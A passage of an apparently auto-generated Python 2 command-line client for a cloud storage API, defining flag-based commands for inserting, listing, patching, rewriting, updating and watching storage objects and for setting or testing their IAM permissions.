u'contentEncoding metadata property. This can be useful when '
u'uploading an object with uploadType=media to indicate the encoding '
u'of the content being uploaded.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'name',
None,
u'Name of the object. Required when the object metadata is not '
u"otherwise provided. Overrides the object metadata's name value, if "
u'any. For information about how to URL encode object names to be '
u'path safe, see Encoding URI Path Parts.',
flag_values=fv)
flags.DEFINE_string(
'object',
None,
u'A Object resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to this object.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl, unless the object '
u'resource specifies the acl property, when it defaults to full.',
flag_values=fv)
flags.DEFINE_string(
'upload_filename',
'',
'Filename to use for upload.',
flag_values=fv)
flags.DEFINE_string(
'upload_mime_type',
'',
'MIME type to use for the upload. Only needed if the extension on '
'--upload_filename does not determine the correct (or any) MIME '
'type.',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Stores a new object and metadata.
Args:
bucket: Name of the bucket in which to store the new object. Overrides
the provided object metadata's bucket value, if any.
Flags:
contentEncoding: If set, sets the contentEncoding property of the final
object to this value. Setting this parameter is equivalent to setting
the contentEncoding metadata property. This can be useful when
uploading an object with uploadType=media to indicate the encoding of
the content being uploaded.
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's current generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
name: Name of the object. Required when the object metadata is not
otherwise provided. Overrides the object metadata's name value, if
any. For information about how to URL encode object names to be path
safe, see Encoding URI Path Parts.
object: A Object resource to be passed as the request body.
predefinedAcl: Apply a predefined set of access controls to this object.
projection: Set of properties to return. Defaults to noAcl, unless the
object resource specifies the acl property, when it defaults to full.
upload_filename: Filename to use for upload.
upload_mime_type: MIME type to use for the upload. Only needed if the
extension on --upload_filename does not determine the correct (or any)
MIME type.
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsInsertRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['contentEncoding'].present:
request.contentEncoding = FLAGS.contentEncoding.decode('utf8')
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['name'].present:
request.name = FLAGS.name.decode('utf8')
if FLAGS['object'].present:
request.object = apitools_base.JsonToMessage(messages.Object, FLAGS.object)
if FLAGS['predefinedAcl'].present:
request.predefinedAcl = messages.StorageObjectsInsertRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsInsertRequest.ProjectionValueValuesEnum(FLAGS.projection)
upload = None
if FLAGS.upload_filename:
upload = apitools_base.Upload.FromFile(
FLAGS.upload_filename, FLAGS.upload_mime_type,
progress_callback=apitools_base.UploadProgressPrinter,
finish_callback=apitools_base.UploadCompletePrinter)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Insert(
request, global_params=global_params, upload=upload, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsList(apitools_base_cli.NewCmd):
"""Command wrapping objects.List."""
usage = """objects_list <bucket>"""
def __init__(self, name, fv):
super(ObjectsList, self).__init__(name, fv)
flags.DEFINE_string(
'delimiter',
None,
u'Returns results in a directory-like mode. items will contain only '
u'objects whose names, aside from the prefix, do not contain '
u'delimiter. Objects whose names, aside from the prefix, contain '
u'delimiter will have their name, truncated after the delimiter, '
u'returned in prefixes. Duplicate prefixes are omitted.',
flag_values=fv)
flags.DEFINE_integer(
'maxResults',
None,
u'Maximum number of items plus prefixes to return. As duplicate '
u'prefixes are omitted, fewer total results may be returned than '
u'requested. The default value of this parameter is 1,000 items.',
flag_values=fv)
flags.DEFINE_string(
'pageToken',
None,
u'A previously-returned page token representing part of the larger '
u'set of results to view.',
flag_values=fv)
flags.DEFINE_string(
'prefix',
None,
u'Filter results to objects whose names begin with this prefix.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl.',
flag_values=fv)
flags.DEFINE_boolean(
'versions',
None,
u'If true, lists all versions of an object as distinct results. The '
u'default is false. For more information, see Object Versioning.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Retrieves a list of objects matching the criteria.
Args:
bucket: Name of the bucket in which to look for objects.
Flags:
delimiter: Returns results in a directory-like mode. items will contain
only objects whose names, aside from the prefix, do not contain
delimiter. Objects whose names, aside from the prefix, contain
delimiter will have their name, truncated after the delimiter,
returned in prefixes. Duplicate prefixes are omitted.
maxResults: Maximum number of items plus prefixes to return. As
duplicate prefixes are omitted, fewer total results may be returned
than requested. The default value of this parameter is 1,000 items.
pageToken: A previously-returned page token representing part of the
larger set of results to view.
prefix: Filter results to objects whose names begin with this prefix.
projection: Set of properties to return. Defaults to noAcl.
versions: If true, lists all versions of an object as distinct results.
The default is false. For more information, see Object Versioning.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsListRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['delimiter'].present:
request.delimiter = FLAGS.delimiter.decode('utf8')
if FLAGS['maxResults'].present:
request.maxResults = FLAGS.maxResults
if FLAGS['pageToken'].present:
request.pageToken = FLAGS.pageToken.decode('utf8')
if FLAGS['prefix'].present:
request.prefix = FLAGS.prefix.decode('utf8')
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsListRequest.ProjectionValueValuesEnum(FLAGS.projection)
if FLAGS['versions'].present:
request.versions = FLAGS.versions
result = client.objects.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsPatch(apitools_base_cli.NewCmd):
  """Command wrapping objects.Patch."""
  usage = """objects_patch <bucket> <object>"""
  def __init__(self, name, fv):
    super(ObjectsPatch, self).__init__(name, fv)
    # Each DEFINE_* call registers one optional request field as a CLI flag,
    # scoped to this command's own FlagValues (fv).
    flags.DEFINE_string(
        'generation',
        None,
        u'If present, selects a specific revision of this object (as opposed '
        u'to the latest version, the default).',
        flag_values=fv)
    # Generation/metageneration values are 64-bit; they are declared as string
    # flags and converted with int() in RunWithArgs.
    flags.DEFINE_string(
        'ifGenerationMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'generation matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifGenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'generation does not match the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifMetagenerationMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'metageneration matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifMetagenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'metageneration does not match the given value.',
        flag_values=fv)
    # Request-body resource, supplied as a JSON string on the command line.
    flags.DEFINE_string(
        'objectResource',
        None,
        u'A Object resource to be passed as the request body.',
        flag_values=fv)
    flags.DEFINE_enum(
        'predefinedAcl',
        u'authenticatedRead',
        [u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
        u'Apply a predefined set of access controls to this object.',
        flag_values=fv)
    flags.DEFINE_enum(
        'projection',
        u'full',
        [u'full', u'noAcl'],
        u'Set of properties to return. Defaults to full.',
        flag_values=fv)
  def RunWithArgs(self, bucket, object):
    """Updates an object's metadata. This method supports patch semantics.
    Args:
      bucket: Name of the bucket in which the object resides.
      object: Name of the object. For information about how to URL encode
        object names to be path safe, see Encoding URI Path Parts.
    Flags:
      generation: If present, selects a specific revision of this object (as
        opposed to the latest version, the default).
      ifGenerationMatch: Makes the operation conditional on whether the
        object's current generation matches the given value.
      ifGenerationNotMatch: Makes the operation conditional on whether the
        object's current generation does not match the given value.
      ifMetagenerationMatch: Makes the operation conditional on whether the
        object's current metageneration matches the given value.
      ifMetagenerationNotMatch: Makes the operation conditional on whether the
        object's current metageneration does not match the given value.
      objectResource: A Object resource to be passed as the request body.
      predefinedAcl: Apply a predefined set of access controls to this object.
      projection: Set of properties to return. Defaults to full.
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    # Positional args are Python 2 byte strings; decode before use.
    request = messages.StorageObjectsPatchRequest(
        bucket=bucket.decode('utf8'),
        object=object.decode('utf8'),
        )
    # Copy only explicitly-set flags onto the request; int() converts the
    # string-typed 64-bit generation flags, JsonToMessage parses the body.
    if FLAGS['generation'].present:
      request.generation = int(FLAGS.generation)
    if FLAGS['ifGenerationMatch'].present:
      request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
    if FLAGS['ifGenerationNotMatch'].present:
      request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
    if FLAGS['ifMetagenerationMatch'].present:
      request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
    if FLAGS['ifMetagenerationNotMatch'].present:
      request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
    if FLAGS['objectResource'].present:
      request.objectResource = apitools_base.JsonToMessage(messages.Object, FLAGS.objectResource)
    if FLAGS['predefinedAcl'].present:
      request.predefinedAcl = messages.StorageObjectsPatchRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
    if FLAGS['projection'].present:
      request.projection = messages.StorageObjectsPatchRequest.ProjectionValueValuesEnum(FLAGS.projection)
    result = client.objects.Patch(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class ObjectsRewrite(apitools_base_cli.NewCmd):
  """Command wrapping objects.Rewrite."""
  usage = """objects_rewrite <sourceBucket> <sourceObject> <destinationBucket> <destinationObject>"""
  def __init__(self, name, fv):
    super(ObjectsRewrite, self).__init__(name, fv)
    # One CLI flag per optional request field, scoped to this command's
    # FlagValues (fv). 64-bit numeric fields are string flags (see RunWithArgs).
    flags.DEFINE_enum(
        'destinationPredefinedAcl',
        u'authenticatedRead',
        [u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
        u'Apply a predefined set of access controls to the destination '
        u'object.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifGenerationMatch',
        None,
        u"Makes the operation conditional on whether the destination object's"
        u' current generation matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifGenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the destination object's"
        u' current generation does not match the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifMetagenerationMatch',
        None,
        u"Makes the operation conditional on whether the destination object's"
        u' current metageneration matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifMetagenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the destination object's"
        u' current metageneration does not match the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifSourceGenerationMatch',
        None,
        u"Makes the operation conditional on whether the source object's "
        u'generation matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifSourceGenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the source object's "
        u'generation does not match the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifSourceMetagenerationMatch',
        None,
        u"Makes the operation conditional on whether the source object's "
        u'current metageneration matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifSourceMetagenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the source object's "
        u'current metageneration does not match the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'maxBytesRewrittenPerCall',
        None,
        u'The maximum number of bytes that will be rewritten per rewrite '
        u"request. Most callers shouldn't need to specify this parameter - it"
        u' is primarily in place to support testing. If specified the value '
        u'must be an integral multiple of 1 MiB (1048576). Also, this only '
        u'applies to requests where the source and destination span locations'
        u' and/or storage classes. Finally, this value must not change across'
        u" rewrite calls else you'll get an error that the rewriteToken is "
        u'invalid.',
        flag_values=fv)
    # Request-body resource, supplied as a JSON string on the command line.
    flags.DEFINE_string(
        'object',
        None,
        u'A Object resource to be passed as the request body.',
        flag_values=fv)
    flags.DEFINE_enum(
        'projection',
        u'full',
        [u'full', u'noAcl'],
        u'Set of properties to return. Defaults to noAcl, unless the object '
        u'resource specifies the acl property, when it defaults to full.',
        flag_values=fv)
    flags.DEFINE_string(
        'rewriteToken',
        None,
        u'Include this field (from the previous rewrite response) on each '
        u'rewrite request after the first one, until the rewrite response '
        u"'done' flag is true. Calls that provide a rewriteToken can omit all"
        u' other request fields, but if included those fields must match the '
        u'values provided in the first rewrite request.',
        flag_values=fv)
    flags.DEFINE_string(
        'sourceGeneration',
        None,
        u'If present, selects a specific revision of the source object (as '
        u'opposed to the latest version, the default).',
        flag_values=fv)
  def RunWithArgs(self, sourceBucket, sourceObject, destinationBucket, destinationObject):
    """Rewrites a source object to a destination object. Optionally overrides
    metadata.
    Args:
      sourceBucket: Name of the bucket in which to find the source object.
      sourceObject: Name of the source object. For information about how to
        URL encode object names to be path safe, see Encoding URI Path Parts.
      destinationBucket: Name of the bucket in which to store the new object.
        Overrides the provided object metadata's bucket value, if any.
      destinationObject: Name of the new object. Required when the object
        metadata is not otherwise provided. Overrides the object metadata's
        name value, if any. For information about how to URL encode object
        names to be path safe, see Encoding URI Path Parts.
    Flags:
      destinationPredefinedAcl: Apply a predefined set of access controls to
        the destination object.
      ifGenerationMatch: Makes the operation conditional on whether the
        destination object's current generation matches the given value.
      ifGenerationNotMatch: Makes the operation conditional on whether the
        destination object's current generation does not match the given
        value.
      ifMetagenerationMatch: Makes the operation conditional on whether the
        destination object's current metageneration matches the given value.
      ifMetagenerationNotMatch: Makes the operation conditional on whether the
        destination object's current metageneration does not match the given
        value.
      ifSourceGenerationMatch: Makes the operation conditional on whether the
        source object's generation matches the given value.
      ifSourceGenerationNotMatch: Makes the operation conditional on whether
        the source object's generation does not match the given value.
      ifSourceMetagenerationMatch: Makes the operation conditional on whether
        the source object's current metageneration matches the given value.
      ifSourceMetagenerationNotMatch: Makes the operation conditional on
        whether the source object's current metageneration does not match the
        given value.
      maxBytesRewrittenPerCall: The maximum number of bytes that will be
        rewritten per rewrite request. Most callers shouldn't need to specify
        this parameter - it is primarily in place to support testing. If
        specified the value must be an integral multiple of 1 MiB (1048576).
        Also, this only applies to requests where the source and destination
        span locations and/or storage classes. Finally, this value must not
        change across rewrite calls else you'll get an error that the
        rewriteToken is invalid.
      object: A Object resource to be passed as the request body.
      projection: Set of properties to return. Defaults to noAcl, unless the
        object resource specifies the acl property, when it defaults to full.
      rewriteToken: Include this field (from the previous rewrite response) on
        each rewrite request after the first one, until the rewrite response
        'done' flag is true. Calls that provide a rewriteToken can omit all
        other request fields, but if included those fields must match the
        values provided in the first rewrite request.
      sourceGeneration: If present, selects a specific revision of the source
        object (as opposed to the latest version, the default).
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    # Positional args are Python 2 byte strings; decode before use.
    request = messages.StorageObjectsRewriteRequest(
        sourceBucket=sourceBucket.decode('utf8'),
        sourceObject=sourceObject.decode('utf8'),
        destinationBucket=destinationBucket.decode('utf8'),
        destinationObject=destinationObject.decode('utf8'),
        )
    # Copy only explicitly-set flags onto the request; int() converts the
    # string-typed 64-bit fields, JsonToMessage parses the JSON body flag.
    if FLAGS['destinationPredefinedAcl'].present:
      request.destinationPredefinedAcl = messages.StorageObjectsRewriteRequest.DestinationPredefinedAclValueValuesEnum(FLAGS.destinationPredefinedAcl)
    if FLAGS['ifGenerationMatch'].present:
      request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
    if FLAGS['ifGenerationNotMatch'].present:
      request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
    if FLAGS['ifMetagenerationMatch'].present:
      request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
    if FLAGS['ifMetagenerationNotMatch'].present:
      request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
    if FLAGS['ifSourceGenerationMatch'].present:
      request.ifSourceGenerationMatch = int(FLAGS.ifSourceGenerationMatch)
    if FLAGS['ifSourceGenerationNotMatch'].present:
      request.ifSourceGenerationNotMatch = int(FLAGS.ifSourceGenerationNotMatch)
    if FLAGS['ifSourceMetagenerationMatch'].present:
      request.ifSourceMetagenerationMatch = int(FLAGS.ifSourceMetagenerationMatch)
    if FLAGS['ifSourceMetagenerationNotMatch'].present:
      request.ifSourceMetagenerationNotMatch = int(FLAGS.ifSourceMetagenerationNotMatch)
    if FLAGS['maxBytesRewrittenPerCall'].present:
      request.maxBytesRewrittenPerCall = int(FLAGS.maxBytesRewrittenPerCall)
    if FLAGS['object'].present:
      request.object = apitools_base.JsonToMessage(messages.Object, FLAGS.object)
    if FLAGS['projection'].present:
      request.projection = messages.StorageObjectsRewriteRequest.ProjectionValueValuesEnum(FLAGS.projection)
    if FLAGS['rewriteToken'].present:
      request.rewriteToken = FLAGS.rewriteToken.decode('utf8')
    if FLAGS['sourceGeneration'].present:
      request.sourceGeneration = int(FLAGS.sourceGeneration)
    result = client.objects.Rewrite(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class ObjectsSetIamPolicy(apitools_base_cli.NewCmd):
  """Command wrapping objects.SetIamPolicy."""
  usage = """objects_setIamPolicy <bucket> <object>"""
  def __init__(self, name, fv):
    super(ObjectsSetIamPolicy, self).__init__(name, fv)
    # Optional request fields exposed as CLI flags on this command's fv.
    flags.DEFINE_string(
        'generation',
        None,
        u'If present, selects a specific revision of this object (as opposed '
        u'to the latest version, the default).',
        flag_values=fv)
    # Request-body Policy, supplied as a JSON string on the command line.
    flags.DEFINE_string(
        'policy',
        None,
        u'A Policy resource to be passed as the request body.',
        flag_values=fv)
  def RunWithArgs(self, bucket, object):
    """Updates an IAM policy for the specified object.
    Args:
      bucket: Name of the bucket in which the object resides.
      object: Name of the object. For information about how to URL encode
        object names to be path safe, see Encoding URI Path Parts.
    Flags:
      generation: If present, selects a specific revision of this object (as
        opposed to the latest version, the default).
      policy: A Policy resource to be passed as the request body.
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    # Positional args are Python 2 byte strings; decode before use.
    request = messages.StorageObjectsSetIamPolicyRequest(
        bucket=bucket.decode('utf8'),
        object=object.decode('utf8'),
        )
    if FLAGS['generation'].present:
      # generation is a string flag holding a 64-bit value; convert here.
      request.generation = int(FLAGS.generation)
    if FLAGS['policy'].present:
      request.policy = apitools_base.JsonToMessage(messages.Policy, FLAGS.policy)
    result = client.objects.SetIamPolicy(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class ObjectsTestIamPermissions(apitools_base_cli.NewCmd):
  """Command wrapping objects.TestIamPermissions."""
  usage = """objects_testIamPermissions <bucket> <object> <permissions>"""
  def __init__(self, name, fv):
    super(ObjectsTestIamPermissions, self).__init__(name, fv)
    # Only one optional request field for this method.
    flags.DEFINE_string(
        'generation',
        None,
        u'If present, selects a specific revision of this object (as opposed '
        u'to the latest version, the default).',
        flag_values=fv)
  def RunWithArgs(self, bucket, object, permissions):
    """Tests a set of permissions on the given object to see which, if any,
    are held by the caller.
    Args:
      bucket: Name of the bucket in which the object resides.
      object: Name of the object. For information about how to URL encode
        object names to be path safe, see Encoding URI Path Parts.
      permissions: Permissions to test.
    Flags:
      generation: If present, selects a specific revision of this object (as
        opposed to the latest version, the default).
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    # Positional args are Python 2 byte strings; decode before use.
    request = messages.StorageObjectsTestIamPermissionsRequest(
        bucket=bucket.decode('utf8'),
        object=object.decode('utf8'),
        permissions=permissions.decode('utf8'),
        )
    if FLAGS['generation'].present:
      # generation is a string flag holding a 64-bit value; convert here.
      request.generation = int(FLAGS.generation)
    result = client.objects.TestIamPermissions(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class ObjectsUpdate(apitools_base_cli.NewCmd):
  """Command wrapping objects.Update."""
  usage = """objects_update <bucket> <object>"""
  def __init__(self, name, fv):
    super(ObjectsUpdate, self).__init__(name, fv)
    # Optional request fields exposed as CLI flags on this command's fv.
    # 64-bit numeric fields are string flags, converted in RunWithArgs.
    flags.DEFINE_string(
        'generation',
        None,
        u'If present, selects a specific revision of this object (as opposed '
        u'to the latest version, the default).',
        flag_values=fv)
    flags.DEFINE_string(
        'ifGenerationMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'generation matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifGenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'generation does not match the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifMetagenerationMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'metageneration matches the given value.',
        flag_values=fv)
    flags.DEFINE_string(
        'ifMetagenerationNotMatch',
        None,
        u"Makes the operation conditional on whether the object's current "
        u'metageneration does not match the given value.',
        flag_values=fv)
    # Request-body resource, supplied as a JSON string on the command line.
    flags.DEFINE_string(
        'objectResource',
        None,
        u'A Object resource to be passed as the request body.',
        flag_values=fv)
    flags.DEFINE_enum(
        'predefinedAcl',
        u'authenticatedRead',
        [u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
        u'Apply a predefined set of access controls to this object.',
        flag_values=fv)
    flags.DEFINE_enum(
        'projection',
        u'full',
        [u'full', u'noAcl'],
        u'Set of properties to return. Defaults to full.',
        flag_values=fv)
    # Local-only flags controlling the optional media download; these are
    # never copied onto the API request.
    flags.DEFINE_string(
        'download_filename',
        '',
        'Filename to use for download.',
        flag_values=fv)
    # NOTE(review): the default here is the string 'False'; gflags appears to
    # parse string defaults for boolean flags — confirm it yields False.
    flags.DEFINE_boolean(
        'overwrite',
        'False',
        'If True, overwrite the existing file when downloading.',
        flag_values=fv)
  def RunWithArgs(self, bucket, object):
    """Updates an object's metadata.
    Args:
      bucket: Name of the bucket in which the object resides.
      object: Name of the object. For information about how to URL encode
        object names to be path safe, see Encoding URI Path Parts.
    Flags:
      generation: If present, selects a specific revision of this object (as
        opposed to the latest version, the default).
      ifGenerationMatch: Makes the operation conditional on whether the
        object's current generation matches the given value.
      ifGenerationNotMatch: Makes the operation conditional on whether the
        object's current generation does not match the given value.
      ifMetagenerationMatch: Makes the operation conditional on whether the
        object's current metageneration matches the given value.
      ifMetagenerationNotMatch: Makes the operation conditional on whether the
        object's current metageneration does not match the given value.
      objectResource: A Object resource to be passed as the request body.
      predefinedAcl: Apply a predefined set of access controls to this object.
      projection: Set of properties to return. Defaults to full.
      download_filename: Filename to use for download.
      overwrite: If True, overwrite the existing file when downloading.
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    # Positional args are Python 2 byte strings; decode before use.
    request = messages.StorageObjectsUpdateRequest(
        bucket=bucket.decode('utf8'),
        object=object.decode('utf8'),
        )
    # Copy only explicitly-set flags onto the request.
    if FLAGS['generation'].present:
      request.generation = int(FLAGS.generation)
    if FLAGS['ifGenerationMatch'].present:
      request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
    if FLAGS['ifGenerationNotMatch'].present:
      request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
    if FLAGS['ifMetagenerationMatch'].present:
      request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
    if FLAGS['ifMetagenerationNotMatch'].present:
      request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
    if FLAGS['objectResource'].present:
      request.objectResource = apitools_base.JsonToMessage(messages.Object, FLAGS.objectResource)
    if FLAGS['predefinedAcl'].present:
      request.predefinedAcl = messages.StorageObjectsUpdateRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
    if FLAGS['projection'].present:
      request.projection = messages.StorageObjectsUpdateRequest.ProjectionValueValuesEnum(FLAGS.projection)
    # When a download filename is given, stream the media to that file with
    # progress/completion printing; otherwise no download is performed.
    download = None
    if FLAGS.download_filename:
      download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
          progress_callback=apitools_base.DownloadProgressPrinter,
          finish_callback=apitools_base.DownloadCompletePrinter)
    result = client.objects.Update(
        request, global_params=global_params, download=download)
    print apitools_base_cli.FormatOutput(result)
class ObjectsWatchAll(apitools_base_cli.NewCmd):
  """Command wrapping objects.WatchAll."""
  usage = """objects_watchAll <bucket>"""
  def __init__(self, name, fv):
    super(ObjectsWatchAll, self).__init__(name, fv)
    # Request-body Channel, supplied as a JSON string on the command line.
    flags.DEFINE_string(
        'channel',
        None,
        u'A Channel resource to be passed as the request body.',
        flag_values=fv)
    flags.DEFINE_string(
        'delimiter',
        None,
        u'Returns results in a directory-like mode. items will contain only '
        u'objects whose names, aside from the prefix, do not contain '
        u'delimiter. Objects whose names, aside from the prefix, contain '
        u'delimiter will have their name, truncated after the delimiter, '
        u'returned in prefixes. Duplicate prefixes are omitted.',
        flag_values=fv)
    flags.DEFINE_integer(
        'maxResults',
        None,
        u'Maximum number of items plus prefixes to return. As duplicate '
        u'prefixes are omitted, fewer total results may be returned than '
        u'requested. The default value of this parameter is 1,000 items.',
        flag_values=fv)
    flags.DEFINE_string(
        'pageToken',
        None,
        u'A previously-returned page token representing part of the larger '
        u'set of results to view.',
        flag_values=fv)
    flags.DEFINE_string(
        'prefix',
        None,
        u'Filter results to objects whose names begin with this prefix.',
        flag_values=fv)
    flags.DEFINE_enum(
        'projection',
        u'full',
        [u'full', u'noAcl'],
        u'Set of properties to return. Defaults to noAcl.',
        flag_values=fv)
    flags.DEFINE_boolean(
        'versions',
        None,
        u'If true, lists all versions of an object as distinct results. The '
        u'default is false. For more information, see Object Versioning.',
        flag_values=fv)
  def RunWithArgs(self, bucket):
    """Watch for changes on all objects in a bucket.
    Args:
      bucket: Name of the bucket in which to look for objects.
    Flags:
      channel: A Channel resource to be passed as the request body.
      delimiter: Returns results in a directory-like mode. items will contain
        only objects whose names, aside from the prefix, do not contain
        delimiter. Objects whose names, aside from the prefix, contain
        delimiter will have their name, truncated after the delimiter,
        returned in prefixes. Duplicate prefixes are omitted.
      maxResults: Maximum number of items plus prefixes to return. As
        duplicate prefixes are omitted, fewer total results may be returned
        than requested. The default value of this parameter is 1,000 items.
      pageToken: A previously-returned page token representing part of the
        larger set of results to view.
      prefix: Filter results to objects whose names begin with this prefix.
      projection: Set of properties to return. Defaults to noAcl.
      versions: If true, lists all versions of an object as distinct results.
        The default is false. For more information, see Object Versioning.
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    # Positional args are Python 2 byte strings; decode before use.
    request = messages.StorageObjectsWatchAllRequest(
        bucket=bucket.decode('utf8'),
        )
    # Copy only explicitly-set flags onto the request.
    if FLAGS['channel'].present:
      request.channel = apitools_base.JsonToMessage(messages.Channel, FLAGS.channel)
    if FLAGS['delimiter'].present:
      request.delimiter = FLAGS.delimiter.decode('utf8')
    if FLAGS['maxResults'].present:
      request.maxResults = FLAGS.maxResults
    if FLAGS['pageToken'].present:
      request.pageToken = FLAGS.pageToken.decode('utf8')
    if FLAGS['prefix'].present:
      request.prefix = FLAGS.prefix.decode('utf8')
    if FLAGS['projection'].present:
      request.projection = messages.StorageObjectsWatchAllRequest.ProjectionValueValuesEnum(FLAGS.projection)
    if FLAGS['versions'].present:
      request.versions = FLAGS.versions
    result = client.objects.WatchAll(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
def main(_):
  """appcommands entry point: registers every generated command.

  Each AddCmd maps a CLI command name to its NewCmd subclass; 'pyshell'
  provides an interactive Python shell and is made the default command
  where the installed appcommands version supports defaults.
  """
  appcommands.AddCmd('pyshell', PyShell)
  appcommands.AddCmd('bucketAccessControls_delete', BucketAccessControlsDelete)
  appcommands.AddCmd('bucketAccessControls_get', BucketAccessControlsGet)
  appcommands.AddCmd('bucketAccessControls_insert', BucketAccessControlsInsert)
  appcommands.AddCmd('bucketAccessControls_list', BucketAccessControlsList)
  appcommands.AddCmd('bucketAccessControls_patch', BucketAccessControlsPatch)
  appcommands.AddCmd('bucketAccessControls_update', BucketAccessControlsUpdate)
